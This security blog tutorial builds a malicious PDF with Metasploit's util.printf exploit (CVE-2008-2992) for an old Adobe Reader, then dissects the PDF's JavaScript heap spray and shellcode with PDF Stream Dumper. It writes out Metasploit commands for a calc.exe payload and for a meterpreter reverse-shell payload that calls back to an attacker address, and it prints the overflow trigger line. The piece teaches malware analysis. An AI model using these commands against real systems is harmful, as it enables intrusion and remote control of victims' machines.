Infected PDFs have always been a privileged way to infect users because this document format is very common and used by almost everyone. Moreover, it exists many ways to exploit Acrobat Reader vulnerabilities and it’s very stealth and elegant way to launch a malware.
In this article, I will show you how easy it is to craft a malicious PDF with custom shellcode, and trigger a vulnerability to execute a payload. We will also analyse the malicious PDF to learn how the payload is stored, and how to extract it. This article is for research purpose only, don’t do bad things!
What is a PDF ? Format Analysis
PDF is object oriented format, defined by Adobe. This format describes a document organization, and preserves dependencies needed for the document (fonts, images, …). These objects are stored within the document as streams and most of the time encoded or compressed. Below is the overview of a classic PDF document. For more information, please read Adobe’s specifications.
Metasploit: Infected PDF creation
We will create a fake PDF with metasploit, containing an exploit attempt, as well as a custom payload (code to execute). The exploit is targeting a specific version of Adobe Reader, so we will need to make some archaeology and find an ancient Reader version (thanks to http://www.oldapps.com/) to install on the target machine.
So, first, let’s make this PDF. We will make a infected PDF that just opens calculator (calc.exe) on the machine, just for demonstration. Open a metasploit console (installation of metasploit is not covered in this article) and type:
use exploit/windows/fileformat/adobe_utilprintf
set FILENAME malicious.pdf
set PAYLOAD windows/exec
set CMD calc.exe
show options
exploit
This should look like this:
Copy the file that has just been created (here /home/osboxes/.msf4/local/malicious.pdf) on a shared drive. You will need to feed your target machine with it.
Execution of the Infected PDF
On the target machine, download and install a vulnerable Adobe Reader version (metasploit tells us it should be less than 8.1.2). I choose to install a 8.1.1 version. Once installed, execute the malicious.pdf file. You should see a calculator being spawned from the Adobe Reader process. That’s the exploit.
I’ve done another PDF but changed the payload slightly, just for fun:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.29
set LPORT 4455
Here’s the result. Adobe Reader now has a backdoor (reverse shell) listening for commands.
PDF Stream Dumper: Infected PDF Analysis
Played enough! Let’s see what’s inside that malicious PDF, and let’s try to extract the malicious payload (we’re still with the calc.exe PDF). First, we will need a tool called PDF Stream Dumper, so download it. Load the malicious PDF with it, and take some time to familiarize yourself with the tool.
We can start by checking if some exploit is detected by the tool using the « Exploit Scan » menu:
Exploit CVE-2008-2992 Date:11.4.08 v8.1.2 - util.printf - found in stream: 6
Indeed, there’s an exploit hidden in stream 6 (the one in blue on the capture). But let’s start by the beginning: when searching for exploits in a PDF, we most of the time encounter heap spray created by a Javascript code. That heap spray is used to push the payload on the heap, ready to be executed once the vulnerability has triggered. If you open Stream 1, you can see:
/Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 5 0 R
That we can translate to OpenAction on stream 5. Let’s move to stream 5:
/Type/Action/S/JavaScript/JS 6 0 R
Which says to execute Javascript located in stream 6. This stream shows plain Javascript, it’s time to open the « Javascript_UI » menu. We immediately recognize a big string hex encoded, and pushed into a variable for heap spray. This is our payload:
Fortunately, we have tools to manipulate it, and understand what it does. Select the payload (the part between quotes), and open « Shellcode_analysis » menu. Then choose « scDbg – LibEmu Emulation ». You will get a new window will the shellcode decoded into bytes (you can even save it to file):
LibEmu is a library able to simulate a processor, it gives information about what the assembly code is trying to do. Just hit the « Launch » button and you will understand:
Here it is, we can clearly see the shellcode will just opens a calc.exe window and exits.
Let’s redo the same analysis for the other malicious PDF (reverse shell):
Uh, self explaining right? Shellcode is loading the library needed to manipulate sockets (ws2_32.dll), and tries to connect back to C&C. I haven’t told about the exploit itself, it’s located at the end of the javascript code (like stated by Exploit search, « util.printf – found in stream: 6 »). It’s exploiting a buffer overflow on printf function to execute arbitrary code (here, our heap-sprayed shellcode).
util.printf("%45000.45000f", 0);
Links
– http://www.sans.org/reading-room/whitepapers/malicious/owned-malicious-pdf-analysis-33443
– http://www.oldapps.com/adobe_reader.php
– http://contagiodump.blogspot.fr/2010/08/malicious-documents-archive-for.html
– http://contagiodump.blogspot.fr/2013/03/16800-clean-and-11960-malicious-files.html
– http://eternal-todo.com/blog/cve-2011-2462-exploit-analysis-peepdf
– http://resources.infosecinstitute.com/analyzing-malicious-pdf/